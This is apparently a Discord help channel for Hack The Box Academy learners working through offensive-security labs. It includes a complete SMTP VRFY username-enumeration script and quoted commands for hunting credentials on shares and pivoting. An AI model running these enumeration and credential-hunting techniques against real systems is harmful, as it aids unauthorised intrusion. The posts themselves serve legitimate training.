By examining the logs located in the "C:\Logs\Dump" directory, determine if an ill-intended login took place after the LSASS dump. Answer format: Yes or No

tall saffron
#

Someone for a hint/help on the chapter "Exploitation of Request Smuggling" of "HTTP Attacks" modules.|| i have the http request smuggling. i can log any request on the site in the comment section, i tested on myself but the admin never vistit the site||

gray yacht
# rustic sage Yes

You can DM what you have and I can try to steer you in the right direction.

rustic sage
#

Thx

winter glade
#

I figured out my flag… what a silly module question

rustic grail
#

Hi, I'm on the module "Cracking Passwords with Hashcat" on the page "Cracking Miscellaneous Files & Hashes", I have a strong difficult to solve the optionnal question withe vmx file to crack with hashcat. ? Could I have some help please

grizzled schooner
#

Pivoting Tunneling and Port Forwarding | Web Server Pivoting with RPivot

Transferred client.py to pivot host - get this error when trying to run it:

Traceback (most recent call last): File "client.py", line 12, in <module> import relay ImportError: No module named relay

Any ideas on how to fix / why? Please @ with responses

hushed furnace
#

I'm stuck on Nmap Firewall and IDS/IPS Evasion - Hard Lab

I think I have pretty much tried everything so far, read modules 2 times but Idk what am I missing

brittle vortex
fathom pendant
haughty fiber
#

attacking common services module attacking ftp questions. Found a user and logged in but the flag and user is wrong

grizzled schooner
#

resolved - didn't copy the whole folder and just did client.py

daring charm
#

Hey guys. I'm working on the Skills Assessment on Introduction to Windows commandline and I'm stuck at this point to ssh into the target.

Is the password supposed to be an empty string or just empty. I've been trying both with no luck. Your help will be appreciated.

fathom pendant
undone mesa
#

Hey does any admin / mod help me ?

fathom pendant
undone mesa
acoustic owl
undone mesa
dawn rune
#

anyone know why I am having trouble spawning the machine for this task? it says "cannot spawn vip machines in non vip server". I have vip+

fathom pendant
dawn rune
#

ahh mb, which channel should I ask in?

fathom pendant
jolly oasis
#

Is anyone available to help with Cross-Site Scripting (XSS) > Session HIjacking? The end of section question.
https://academy.hackthebox.com/module/103/section/1008

I have my cookie but can't seem to add it in the Storage tab. The instructions say to click the + and add our cookie. Clicking the + doesn't allow me to add anything.

fathom pendant
#

And you can edit the name and value from that

jolly oasis
#

Ahh, there we are. Thank you!

#

I'm a bit terrified of the Skills Assessment at the end of this module 🤣

broken perch
#

Im having an issue with pwnbox bash, can someone help me?

fathom pendant
compact patrolBOT
broken perch
fathom pendant
#

If youre having problems with the pwnbox crashing: thats a platform issue that support can handle

broken perch
#

its just a thing about bash that i dont understand

#

there's a module where i have to use sthe ssh command in pwnbox, and when i use it and it asks forr the password, the caret turns thick and white and i stop being able to type

fathom pendant
#

It intentionally hides what you type, for security reasons

broken perch
#

ohh

broken perch
#

like really, thanks a lot

fathom pendant
#

This is why phrasing your question properly helps :)

errant moss
#

Well to be fair, Patriot thought it was a bash problem, so original question was about that.
Then it was actually something else, that happens

broken perch
#

im almost completely new

#

just a few weeks in

fathom pendant
errant moss
#

Welcome! And keep at it!

fathom pendant
#

And originally, they said "crash" not bash

errant moss
#

oh, I thought it was bash. Alright then.

broken perch
#

i said pwnbox bash, but maybe thats not the right term

errant moss
#

Close enough! You had a problem, asked for help, and got it. That's the important part. And to have fun!

fathom pendant
#

Well bash is its own thing not specific to the pwnbox

#

Bash is just the language that the terminal uses to execute commands

broken perch
#

and it is quite fun, especially when you get past things that previously were difficult

errant moss
#

Yes indeed! 🙂

uneven dune
#

because i enter the answer in multiple ways and says is wrong, but i am not sure if i am wrong or the answer need a specific format to be taken like completed

uneven dune
#

solved, i was wrong

upbeat zodiac
#

hey guys for the path Introduction to Threat Hunting & Hunting With Elastic >Threat Hunting With The Elastic Stack>Hunting for Stuxbot I have a real issue with the question #2
Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.

I Actually think I got the path but is not getting accepted in the answer. Can someone help me with that?

rustic sage
#

Windows fundamentals

#

skills assessment, i cant view it at all

tired flax
#

Hello,
Someone out there has done HTTP Attacks skill assessment, my CRLF is not working and I have HTTP smuggling working.
Some can help me please.

indigo roost
sick stump
#

Hey guys hope everyone is having a great day, in the Footprinting module, in the SMTP section, the Question "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer."

I tried to ask an ai to code a python script, which would use the usernames in the footprinting-usernames.txt given, and then output the valid usernames which i believe would not return a status code of 252, or 505. but for some rzn whenever i tried , it said connection refused.

So my question is, is there like a rate-limiting thingy which is on SMTP, or is that just a shit script from the Ai?

Thanks in advance

#
import argparse
import sys
import os

def check_smtp_user(server, port, username):
    """Check if a username is valid using SMTP VRFY command."""
    try:
        # Connect to the SMTP server
        smtp = smtplib.SMTP(server, port, timeout=5)
        # Send VRFY command
        code, message = smtp.verify(username)
        smtp.quit()
        # Check for 252 status code
        return code == 252, message.decode('utf-8') if isinstance(message, bytes) else message
    except (smtplib.SMTPConnectError, smtplib.SMTPServerDisconnected, ConnectionRefusedError):
        print(f"Error: Could not connect to {server}:{port}")
        return False, None
    except smtplib.SMTPException as e:
        print(f"SMTP error for {username}: {str(e)}")
        return False, None

def main():
    # Parse command-line arguments
    parser = argparse.ArgumentParser(description="Check usernames against an SMTP server using VRFY.")
    parser.add_argument("server", help="SMTP server address (e.g., mail.example.com or IP)")
    parser.add_argument("port", type=int, help="SMTP server port (e.g., 25)")
    parser.add_argument("username_file", help="Path to text file with usernames (one per line)")
    args = parser.parse_args()

    # Check if username file exists
    if not os.path.isfile(args.username_file):
        print(f"Error: Username file '{args.username_file}' not found.")
        sys.exit(1)

    # Output file for valid users
    output_file = "valid_users.txt"

    # Clear the output file if it exists
    with open(output_file, 'w') as f:
        f.write("")

    print(f"Checking usernames against SMTP server {args.server}:{args.port}...")

    # Read usernames and check each
    valid_users = []
    with open(args.username_file, 'r') as f:
        for username in f:
            username = username.strip()
            if not username:  # Skip empty lines
                continue
            is_valid, message = check_smtp_user(args.server, args.port, username)
            if is_valid:
                print(f"Valid user found: {username} (Response: {message})")
                valid_users.append(username)

    # Save valid users to output file
    with open(output_file, 'a') as f:
        for user in valid_users:
            f.write(f"{user}\n")

    # Display results
    if valid_users:
        print(f"\nValid usernames saved to {output_file}:")
        with open(output_file, 'r') as f:
            print(f.read().strip())
    else:
        print("No valid usernames found.")

    print("Done.")

if __name__ == "__main__":
    main()```
#

sorry if this looks like it floods the chat, but it would rlly help me if can someone tell me why it didnt work

regal glacier
#

I don't think this has been resolved yet. I followed the steps to install the WebDav redirector but I get an error saying that I don't have the "adequate user rights" to make the changes

fathom pendant
#

smtp-user-enum

sick stump
# fathom pendant smtp-user-enum

oh i just took a look at it, it sums up everything i wanted

i just realized the ai script can work, but my dumbass didnt notice the target server ran out of time 💔 🥀

#

i sat for a whole hour switching between scripts just for that to be the issue

rustic sage
#

Introduction to Bash Scripting
Conditional Execution

not sure how to do this

fathom pendant
rustic sage
#

Im physically unable to do it

fathom pendant
#

You copy/paste and insert the condition where it tells you

rustic sage
#

Remote Code Execution (RCE) via the Theme Editor

fathom pendant
#

Im not staff, and haven't done that module

rustic sage
fathom pendant
#

I suggest focusing on one module at a time. Unless you finished up the bash module and moved on to the wp one

#

Did you edit the right theme 404?

#

Also that module is above t0, so avoid spoilers

rustic sage
#

with it, just trying tio get the ones i done out of the way halfway

#

CJCA is about to be taken in a weeks time

rustic sage
rustic sage
rustic sage
dapper portal
#

Hello all

#

uname -r gets the kernel release, correct?

fathom pendant
#

But also for that question: if youre getting "parrot..." youre not connected to the target machine

dapper portal
#

trying to work out why the module will not accept answer, and just read that

#

a bit annoying

fathom pendant
#

It also helps to give the module name and section

dapper portal
#

LOL, of course but was doubting myself more than the module and section

fathom pendant
#

Well if you give the module and section people are able to help you more with the expected format of the answer

dapper portal
#

understood, but I wanted to verify I was not typing in an incorrect command more than I was seeking help on a particular module question

#

ssh into worked

fathom pendant
#

Ah, the classic issue of not reading the given instructions

dapper portal
#

excuse me?? The fact that the in browser instance exists infers that the user has a choice, there are instances where the user cannot use SSH, so will use the in browser. The is nothing in the instructions to say do not use, I mean why is it there?

#

keep the snark to yourself, please

fathom pendant
#

And ill repeat myself every time ig:
Spawn instance -> this starts the in-browser attack box
Click here to spawn target -> this spawns the target to attack/connect to
I believe this distinction is made in the Intro to academy module

rustic sage
#

skill assessment - wordpress attacks
Submit the contents of the flag file in the directory with directory listing enabled.

what does the word "directory listing" mean?

fathom pendant
fathom pendant
#

I.e. if you start a python web server, then visit in a browser -> you get the directory listed

sterile solstice
#

hey everyone. I'm doing "Pentest in a Nutshell", section "Windows Enumeration" (https://academy.hackthebox.com/module/296/section/3402), and for some reason i can't get the right answer for: "What is the exact OS Version that WinPEAS delivers?" I've run different versions of winPEAS, used other commands, and its not accepting any variation of the exact OS. what am I missing?

full echo
full echo
sterile solstice
full echo
sterile solstice
#

That doesn't help. Ive copied and pasted many strings from the different winPEAS.

full echo
sterile solstice
#

and ||Microsoft Windows Server 2019 Standard 10.0.17763.2628|| doesnt work lol.

rustic sage
#

is there a default password for wordpress?

vernal edge
#

does anyone have a good wordlist to give me?

cloud urchin
vernal edge
rustic sage
cloud urchin
vernal edge
cloud urchin
severe kiln
#

How do I use the tools in termux tool X

rustic sage
cloud urchin
cloud urchin
rustic sage
rustic sage
cloud urchin
rustic sage
cloud urchin
#

No one's going to scour each section of the module to find that question. You really should just include it in your initial post.

rustic sage
#

it is 5am for me so i should probabkly continue tomorrow

cloud urchin
#

but you're just waking up

rustic sage
#

i been up all night grinding through the CJCA im like 80% done nearly

#

It's fine i'll have a go when im awake completing skills assessment

cloud urchin
#

nice

#

get some sleep

wooden seal
#

hacker for hire it seemskek

lime mango
#

Nope...

storm elk
#

If you lost your robox account, this isn’t the place

#

Have a read of the #rules and then #welcome 🙂 if you need an ethical hacker, this channel definitely isn’t the place to ask

lime mango
#

Self trained programmer and a web developer but it's seems difficult due to limited resources....just needed a bit assistance with some work..

#

Hope I'm breaking the rules in anyways

#

Not breaking the rules anyways..

storm elk
lime mango
#

Thanks....

maiden zenith
#

i am currently on the setting up module visualization and to say the least i am lost . do i install proxmox or VirtualBox or do i install both

cloud urchin
#

most of those are just showcasing various ways to setup vm's you can use.

#

you just need to pick one. i like vmware myself, but whatever works for you. you don't need to setup a vps etc.

maiden zenith
#

are there any advantages or are they all the same

#

what is the one mostly used

cloud urchin
#

personal preference and probably some features

#

vmware workstation pro is free now, proxmox is good

maiden zenith
#

got thank you

daring charm
tall saffron
#

The lab about "Exploitation of Request Smuggling" in the HTTP Attack module isnt working properly. i was confirmed that my smuggling request is the good one but the admin never visit the website so i can have his cookie posted where it must be. And please you must stop simulated http request smuggling labs, put the time it is needed to really implement a vulnerable lab

waxen totem
#

This isn't a hacker for hire server, go look for professionals in the industry through other means.

violet cobalt
waxen totem
violet cobalt
winter eagle
#

Hey everyone please need a help . What other server is secure and fast for creaking a password and clone a password. I tried many but couldn't find a secure server .

Thanks in advance

brittle vortex
midnight solstice
#

im stuck at the introduction to assembly course skill assessment i managed to make the shellcode.o file now idk what to do next

#

for task 1

wooden glade
#

just link it using ld to make it an elf assuming you want to run it

#

google "make elf file from object files using ld/linker"

midnight solstice
wooden glade
#

im like 90% sure the academy module will have instructions on how to do it considering its supposed to teach you and all

midnight solstice
#

yes i know where to find the command to make into elf im just asking if i must make into elf

wooden glade
#

if you want to run it, yeah

midnight solstice
#

right ok

lunar patio
#

Try using request repeating to be able to quickly test commands. With that, try looking for the other how i solve this in Repeating Requests

rain mirage
#

module- SHELLS & PAYLOADS
PHP Web Shells

i have uploaded the webshell and its giving the wrong file type error as intended , but when i go into the burp to modify the request i cant find the particular request in which the shell is present . there is no post request in the list.?

wooden seal
#

Setting up
The multiplexer
Copied pasted .tmux.conf text and created a file and now my dock looks like this)
so my query is which nerd font should i install to fix the icons stuff

halcyon grail
#

Hi

waxen totem
#

Contact local law enforcement, we can't help you

halcyon grail
#

Ok

midnight solstice
#

for the assembly introduction skill assessment task 1 do i have to run it in the server

full echo
brittle vortex
eager spindle
#

https://academy.hackthebox.com/module/112/section/1080 Can anyone give me some advice on this topic? I have no idea. I just scanned what ports are open and tried to connect, and entered the account and password. Regardless of whether it is a real username or not, the result returned is the same.

full echo
flint palm
#

Guys hello If I cancel current subscription will modules opened by it get closed?

fathom pendant
flint palm
#

so if the module isn't completed it will get closed?

fathom pendant
#

I believe so. It's best to reach out to support to confirm

summer acorn
#

Hi, I have this same issue, probably just being a silly goose but can anyone give me a hint?

rustic sage
#

Hacking WordPress
Skills assessment

Well im in the LFI vulnerable plugin and im not able to make changes to the website plugin code

uneven obsidian
#

make sure you edit the right 404.php page

summer acorn
#

Hey how did you get around this? I also don't know what to do once I've found the three ports XD

rustic sage
#

for the plugin file

flint palm
#

Guys who has completed WPA2 module of HTB what to do if the reaver is waiting for very long

#

?

rustic sage
#

"Sorry, that file cannot be edited."

last musk
#

Still stuck on Windows Privilege Escalation Pillaging path for CPTS on HTB academy I cant login into slack I got the cookie for the user but doesn't work it base 64 encoded it for the user grace pls help been stuck for a week on this question

rain mirage
rustic sage
uneven obsidian
#

Dm me

drowsy vector
#

Need some help with Windows Privilege Escalation - Windows Server.

My Metasploit is telling me that the bind is failing because the ip:port is either in use or unavailable:

||msf6 exploit(windows/smb/smb_delivery) > [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (10.129.133.121:445).||

waxen totem
drowsy vector
#

I already did, it says that PID 4 is listening in on it and the processname is System

waxen totem
drowsy vector
#

I am using my own vm

waxen totem
#

Run msfconsole with sudo maybe

drowsy vector
#

I already ran it as root

waxen totem
#

I'd just swap to a different shell method, you can still escalate with any form of meterpreter session

drowsy vector
#

Ah alright, will try another method then

flint palm
#

Attacking WPA/WPA2 Wi-Fi Networks has someone completed this module and what to do if reaver works very slow?

eager spindle
#

Sorry to bother you guys, I have a small question. Is there any connection between the three labs in a module: Easy, Medium, Hard? Just like the footprinting module.

flint palm
#

what you mean in connections?

eager spindle
#

Related

#

For example, the data in the simple lab can also be used in the medium

fathom pendant
#

Also the footprinting labs arent necessarily as connected as you think

eager spindle
fathom pendant
eager spindle
fathom pendant
#

Then I dont have that one in memory

eager spindle
jaunty wave
#

Hi guys

waxen totem
fathom pendant
#

Register an account? That doesnt sound familiar to that one

waxen totem
eager spindle
fathom pendant
waxen totem
fathom pendant
#

Ah, brain is mush

#

My brain combined regardless and entered somehow

#

But you should be able to find a real user/pass

waxen totem
fathom pendant
#

No brute forcing (of the mail service) required

uneven obsidian
#

Hey, i am in the AEN module and im trying to conduct port forwarding to get a reverse shell back to my host from dev01 with ligolo, can someone please assist me setting up the listener with ligolo ? for some reason i cannot get the shell back ^^

fathom pendant
#

If you read the engagement brief (the paragraph above the lab) you should be able to figure it out

eager spindle
#

I use chatgpt, and it keeps asking me to brute force it

fathom pendant
fathom pendant
uneven obsidian
#

can I pleasepleaseplease DM you with a snippet 🙂 ?

fathom pendant
#

But the biggest part of AEN should be learning to unstick yourself

#

Look to and read documentation and double pivot guides

#

Im assuming youre doing AEN blind as well

uneven obsidian
#

yes sir !

jaunty niche
#

What does this role that I currently have mean?

hardy spire
jaunty niche
#

what is this?

fathom pendant
jaunty niche
fathom pendant
#

:)

jaunty niche
fathom pendant
#

Because you filled out the form?

#

Lmao

#

The parental consent form

#

Only staff can assign it, not mods

jaunty niche
#

I got really scared I hope HackTheBox didn't ban me!

jaunty niche
fathom pendant
#

Only certain staff have access to view the uploaded form, and they assign that role manually to help keep track of users. That way if you say something, and dont have the role, then someone will double check then prompt you to fill out the form and send it in

#

Due to HTB ToS stuff

jaunty niche
alpine ingot
#

is the 3rd skill assessment on attacking common applications supposed to be as easy as using the type command?

fathom pendant
alpine ingot
#

yeah lol, i mentally prepared myself for war but had it completed in like 5 minutes

hardy spire
#

i feel it

#

thick client app...

alpine ingot
#

I'm sooo closeeeeeeee

eager spindle
hexed oyster
#

Ok. Struggling with "Web services and API attacks" final assessment. Am i supposed to be sending requests to http://target:port/wsdl?wsdl

#

Like, is that the correct endpoint? Or am i missing something?

cloud urchin
near sierra
#

Really sorry

cloud urchin
#

@near sierra Please read the #rules and follow the instructions in #welcome to gain access to more appropriate channels.

alpine ingot
sick stump
#

I hate enumeration 😔

fathom pendant
#

But, its important to know anyway

sick stump
fathom pendant
#

Sorry @uneven obsidian I did not give permission to dm

solar citrus
#

Hi, just started the CPTS track and racking my head on Nibbles 🙄 (yeah, I know). I can work through everything except the privilege escalation. I have tried multiple scripts in my monitor.sh, but it always prompts me for the password of the 'nibbler' user, sudo -l looks good. I have tried resetting the machines and following different walkthroughs, but I always get prompted. Any clue what I am missing?

onyx rampart
#

Hi guys, I'm stuck on the Password Attacks - Skills Assessment
I've logged in to the DMZ, found some creds (don't know what to do with them), did pivoting using chisel

But when i tried to scan using nmap from my machine, it doesn't give the expected output. But at the same time, if run nmap from DMZ, I see the ports.

Is this expected behavior or am i missing something ?

fathom pendant
onyx rampart
fathom pendant
#

¯_(ツ)_/¯

#

I used nxc to spray around

onyx rampart
#

Yup, I'm trying that, but I'm not sure if proxychains is working or not. As there is no way to verify

limber river
#

man just use ligolo for pivoting

onyx rampart
flint palm
fathom pendant
flint palm
#

understand

#

i changed several targets on previous task until the target worked normally

onyx rampart
#

Hi guys, I tried using ligolo, but while doing nmap scan, in the ligolo terminal, all nmap requests are getting the same error CONNECTION REFUSED. Is it that the host is blocking the nmap requests ?

nevermind, I'm just dumb, got the requests

fathom pendant
#

Lol

solar citrus
onyx rampart
#

Well, i found some creds (hw.....) and tried conecting to the open services on F01, but not getting logged-in. Can anyone give any hints on where I can use it ?

fathom pendant
fathom pendant
#

So maybe its not used for some services but you can authenticate on others 😉

onyx rampart
fathom pendant
onyx rampart
fathom pendant
#

Im at a party for my mom's bday

onyx rampart
#

Ohh okay then no worries, thanks for your help 🫡

midnight solstice
#

<@&861185840277487616> spam bot

#

above me

#

ty

uneven obsidian
#

Someone who finished the AEN module and can assist me with doing the port forwarding with Ligolo?
I managed to do it with ssh port forwarding but I want to try more methods.

I will shared detailed snippets and explanations in DM

uneven obsidian
onyx rampart
#

Solving the Password Attack - Skill Assessment, I've found where the creds are used in F01, found some other usernames as well, but the files which I thought might be interesting is just the HTB staff messing with me. Can someone DM as can't disclose information here

glacial knot
#

anyone wants to get into blue teaming hit me up im putting something together for people starting out / wanting to start in cyber

frosty ferry
#

i am in bash scripting and stuck on this question

#

var='8dm7KsjU28B7v621Jls'
value='ERmFRMVZ0U2paTlJYTkxDZz09Cg'

for i in {1..40}
do
  var=$(echo $var | base64)

  if [[ $var == *$value* ]] && [ ${#var} -ge 113469 ]; then
        echo ${var: -20}
  fi
done ```
#

here's my code

flint palm
#

Guys hello has anyone done Attacking WPA/WPA2 Wi-Fi Networks

#

if someone has done pls contact me

gray yacht
uneven obsidian
#

I’m looking to get a reverse shell on the internal network from my attack host

flint palm
#

Guys hello has anyone done Attacking WPA/WPA2 Wi-Fi Networks if someone has done pls contact me

uneven obsidian
gray yacht
uneven obsidian
#

Yep

#

Can I DM you with screenshots ?

gray yacht
terse sedge
#

I'm in Credential Hunting in Network Shares - I'm getting no results from netexec when spidering the remote share: nxc smb 10.129.239.172 -u user -p pass --spider \\path\to\share --content --pattern "passw"

#

It just says "Done spidering", and dumps me back to a prompt.

#

Any idea what's going on?

gray yacht
woeful topaz
#

Hey ya, I am looking for one of my doubts to be resolved, can anyone help me?

#

Hey yeah, just wanna know about one part of a file transfer module " Living off the Land" and I am a bit confused about it.

#

the problem is I am having confusion about bits admin file sharing, when I tried to do it over local host , it didn't happen first later, I tried asking chatgpt for it and it told me that we need to create an http server first for the file transfers.

cloud urchin
#

@tidal thorn No.

tidal thorn
#

thank u 😔

fathom pendant
#

@pine cypress try not to spoil things; and no its not a side effect of ligolo.
Many people do AEN blind, so sharing stuff can ruin people's experiences. Not to mention it's above tier 0

pine cypress
fathom pendant
#

My best assumption is youre not dialing the right ip, not that ligolo is broken

fathom pendant
#

@trim shale careful with screenshots containing answers

trim shale
#

sorry completely my bad

#

got it for next time

fathom pendant
#

Also, theres instructions above the first question. You're expected to run the commands to get the answers from that ssh session

trim shale
#

yes i saw them but i tried following the syntaxis that is shown before but i assume im not writing it right

#

i saw before that the command to connect to the tagret was "ssh htb-student@[IP address]" but whe i try to put the ip address it takes the ip as the hostname

hollow kernel
#

Hi i have a problem with an exploit in shells and payloads module

#

Metasploit doesnt find 50064.rb exploit i dont know why

trim shale
#

so i finally wrote the syntaxis for the ssh correct but now the password that was given is incorrect an the access is denied

fathom pendant
#

Ctrl+shift+v to paste in terminal

polar raven
polar raven
fathom pendant
#

Let's not drag this out for fucks sake

agile cypress
#

...

narrow oriole
lofty pollen
#

hello

I am doing the section of android fundatmentals and I havent been able to pass this two questions

#

cam someone help me I tried multiple thins and nothig worked

drowsy raptor
rustic sage
#

I know how to check for the hidden files, just cant authenticate need a nudge please
Introduction to Windows Command Line
skills assessment

drowsy raptor
#

I have never done this from a security point of view and know nothing about offensive ops against Android, I'm just saying this as a person who uses an Android phone every day lol

fathom pendant
rustic sage
#

for If you search and find the name of this host, you will find the flag for user2. , I used and it didn twokr

lofty pollen
fathom pendant
rustic sage
#

Ah,,,,,,,, holdoon

rustic sage
fathom pendant
#

was the copy/paste lowercased?

rustic sage
#

i got it

rustic sage
drowsy raptor
#

Mine is QP1A.190771.020.XXXXXXXXXXXXX for example

#

I mean my phone's not the skill assessment

#

So that might be an indicator. Unsure however since it may differ based on the version

rain mirage
#

the module : SHELLS & PAYLOADS
The Live Engagement

question : Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt

i have figured almost everything but at the end when i run the 50064 exploit in msfconsole its saying :
[-] Exploit failed: One or more options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.

any hints ?

cloud urchin
#

type options, make sure everything is filled out correctly. looks like the remote host is wrong or something.

drowsy raptor
#

you likely haven't specified the host

rain mirage
#

i have done that infact i have double checked the rhost is correct (blog.inlanefreight.local)

warm juniper
#

Hello,

Any good resource to learn cloud security on HTB?

charred night
#

I started studying cybersecurity Which module do i start

rain mirage
#

its not like i cannot define dns in msf as rhost , is it?

rain mirage
charred night
#

Finished

cloud urchin
rain mirage
#

for that wont i be needing the ip .?

cloud urchin
#

yeah

rain mirage
cloud urchin
rain mirage
fathom pendant
rain mirage
fathom pendant
#

no, i'm mostly recalling this info and not looking at my notes. I do not wanna get up

#

@proud jasper that's not what this server is about

proud jasper
summer acorn
#

Hey, I'm struggling with the Server-Side-Attacks module of CBBH Pathway (specifically Identifying SSRF). I have found three ports but can't work out how to get the flag. Has anyone done this module before and can give me a hint?

rain mirage
#

Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt

im in the target , its saying access denied for viewing the flag .. so i need to do privilege escalation?

rain mirage
#

Anyone ? ..

cobalt lichen
midnight solstice
#

how do i edit an asm code with GDB

onyx rampart
#

I need a hint in Skills Assessment - Password Attacks
I'm currently on J01 machine using bd**** creds. I tried dumping hashes, but the Admin hashes are not there, not sure what I'm missing. I even pivoted to DC01 using PiT, dumped the creds there, but haven't got any. If you guys have a hint, it would be great. Thanks

midnight solstice
#

dude this is a hacking server so idk why ur tryna phish people in here

#

why is bro sending us a mediafire file

#

anyways <@&861185840277487616>

#

scam account

#

ty

#

also its in cwee chat

midnight solstice
#

can someone help me with task 1 for assembly module

#

the skill assessment part

flint palm
onyx rampart
south marten
#

hello, im in AD enum MODULE doing ACL ENUM, how long its takes no have the output.

#

i thinks its ok btw

lofty pollen
#

hello

I am doing the section of android fundatmentals and I havent been able to pass this two questions.

cam someone help me I tried multiple thins and nothig worked

sour nacelle
#

Any hint for Abusing HTTP Misconfigurations Skills Assessment - Easy

I feel like I have tried literally anything, even found XSS that seems useless, please anything would help

clear marsh
#

Hi, I am planning to buy the academy student subscription. So how do I purchase it. When I checked academy help center, I need to send mesage in HTB chat, but I am not seeing any chat bubble in my htb academy pages.

uneven obsidian
#

Module: AEN
I'm doing this module blind ^^

I exported with sharphound collection the jsons files but when I try to upload them to bloodhound it stucks on 0%

I have tried to clear the DB of neo4j and I've tried to upload .json file of the tombwatcher machine which uploaded instantly..

Any suggestions ?

#

there is a big different obviously between the files size but it litreally stuck on 0% for a while

acoustic owl
uneven obsidian
#

no oops

#

if my bloodhound version is 4.3.1, do I need to download sharphound 4.3.1?

#

the last sharphound version is 2.7.0 which this is the one I used

acoustic owl
#

It just has to be compatible, not have the same version number.

uneven obsidian
#

well, it's working, i guess it happened because the computer json file is 2.07 MB

short solar
#

Hi everyone, where can we report outdated information encountered in a module?

uneven obsidian
#

@acoustic owl it seems that the issue is only with teh computes.json file, i tried to collect only this file again and upload it to bloodhound but the same issue is happening..

the other json files has successfully uploaded

#

May I dm you please ?

midnight solstice
acoustic owl
acoustic owl
uneven obsidian
#

but the other json files has uploaded successfully

blazing pagoda
#

guys i'm having problems connecting to the htb vpn, somebody can help me?^

#

i use sudo name.ovpn
and it starts to connect
but when i go to the selected ip address it doesn't work
Apache 2 default page appears

onyx rampart
blazing pagoda
#

yeah all packets arrive

onyx rampart
#

Then it might be intentional.

Check the port in the URL

blazing pagoda
#

i'm cooked ahah

#

there isn't a port and i was trying to acces with the browser xD

uneven obsidian
#

@acoustic owl thanks again to the one and only !! 🙂 always helpful

analog carbon
#

Hi guys, Im doing CBBH path and currently working on module/80/section/781

So I have tried to > a seq from 0->1000

then used ffuf to brute force but currently stuck

can anyone help?

ancient niche
#

Good Afternoon guys I need little help with module Ai pls

onyx rampart
ancient niche
#

pls I need help

plain summit
#

I am having trouble using xfreerdp in the ssh session for:

AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the C:\flag.txt file on MS01.

My main error was:

failed to open display: 
Please check that the $DISPLAY environment variable is properly set. 

The most recent recommendation on how to fix this issue was to use ligolo-ng. I was able to get agent to run on the ssh machine and proxy to run on the local machine. When I run the sudo ip route add targetip dev ligolo during setup, I lose access to the targetip entirely. What am I supposed to route to in ligolo-ng when setting up a pivot for this scenario? Please don't roast me too hard

delicate adder
#

I can't understand the command output. I had to use ctrl+c to stop it otherwise it would continue without stopping. I can't understand what the password and username should be.

safe star
plain summit
delicate adder
#

when I run it as administrator it tells me sudo: netexec: command not found

safe star
plain summit
safe star
delicate adder
#

the service is winrm

delicate adder
safe star
plain summit
delicate adder
safe star
plain summit
#

I might just say Start in ligolo next time to see if it causes issues. Maybe Route to ssh is not a good idea since I'm already using it.

safe star
# plain summit Yeah

I used ligolo for this part too but I’m not sure if it was necessary to pivot if you already have the parrot ssh

delicate adder
#

since there are not many words in the file with the list of passwords and usernames, so it seemed pointless to let it do so

#

I already tried leaving it for 5 minutes but it doesn't find anything

safe star
glacial ermine
#

If that’s allowed if not sorry

acoustic owl
#

Please contact Instagram Support.

plain summit
#

I'm assuming not Targetip

safe star
plain summit
safe star
#

Whichever the dc is on

plain summit
safe star
#

The subnet the internal machines your attacking

mossy tiger
#

Hey all, i have a question about attacking common applications: thick client. https://academy.hackthebox.com/module/113/section/2139 The module says "Checking the memory maps at this stage of the execution, of particular interest is the map with a size of 0000000000003000 with a type of MAP and protection set to -RW--" But id doesnt explain WHY this frame in the memory map is interesting. is it the -RW-- that is indicating it? does the size have anything to do with it? Typically what would you be looking for when digging through these? Thanks for anyone who can help!

wheat silo
#

Hey, I'm doing the credential hunting in network shares exercise in the password attacks module (https://academy.hackthebox.com/module/147/section/1334) . I'm stuck trying to find the Domain Admin password. I ran Snaffler with the command ./Snaffler.exe -u -o snaffler.log -m C:\Users\Public\Documents . Looking through all the files returned from the Admin share I still haven't found any working creds. There are a lot of mentions of the word 'password' in the Snaffler output but none seem to be the Domain Admin, what should I do to refine my search?

uneven obsidian
#

Does someone knows why bloodhound sometimes does not resolve the group name ? for some groups on bloodhound I see their SID and the domain name without the group name

fathom pendant
wheat silo
fathom pendant
teal arrow
#

Hey guys, I'm barely getting by with this password attacks module, does anyone has any good resources were I can learn more about PtT. I feel like the information is all over the place.

split portal
#

guys I am having issues with pivoting module, on port forwarding doing everything right to access the rdp on the internal network but its showing filtered when running nmap, have tried everything, please help needed with that!

zenith pagoda
#

Hello

#

Replicate the Credential Dumping attack described in this section and provide the NTLM hash of the Administrator user as your answer. "C:\Tools\Sysmon" and "C:\Tools\Mimikatz" on the spawned target contain everything you need.

#

Having problem in this questions in Analzying evil with sysmon and event logs

#

When I tried to search event 10 there is no logs

#

in sysmon

#

anyone can help please

tired flax
#

Out-of-Band DNS

zenith pagoda
#

??

zenith pagoda
#

I got the event log 10 in sysmon but cant find the correct I tried searching for mikimatz and agentEXE but nothing is found can someone help here please

cloud urchin
#

Always best to include the module, section ,and question you're on, not just one or two

rustic sage
#

https://academy.hackthebox.com/module/167/section/1633
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

I pulled the event ID but it says this.

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
3/28/2023 12:53:54 PM         4625 Information      An account failed to log on....
3/28/2023 12:53:54 PM         4625 Information      An account failed to log on....

doesnt even give me what account failed

fathom pendant
rustic sage
#

Okay i will try

split portal
#

has anyone done pivoting module ? I am stuck on port forwarding second question where i need to rdp ? has anyone completed it ??

cloud urchin
#

many have

split portal
#

I have followed all the steps doing ssh -D 9050 ubtunt@ip then adding socks4 127.0.0.1 9050 inside my proxychains4.conf file still when I look for rdp on that internal network it shows connection refused and showing filtered with nmap, saw some people having same issues on the fourm, the solution they have shared aint working as well, I have tried static port forwarding as well, banging my head on it for hours..

cloud urchin
#

if everything is setup properly it should work

split portal
#

Exactly lol, tried it on the box as well, still facing the same issues, asked a friend who has done the module saying it should as everything looks find but unfortunately its not working for me

cloud urchin
#

if you think it's the environment you can reset it or try another region/server but it's probably something in your setup

split portal
#

I have tried it many times with the steps mentioned in the module , I have done it the way I have shared, can you please point out the mistake if you can find it cause i cant 😦

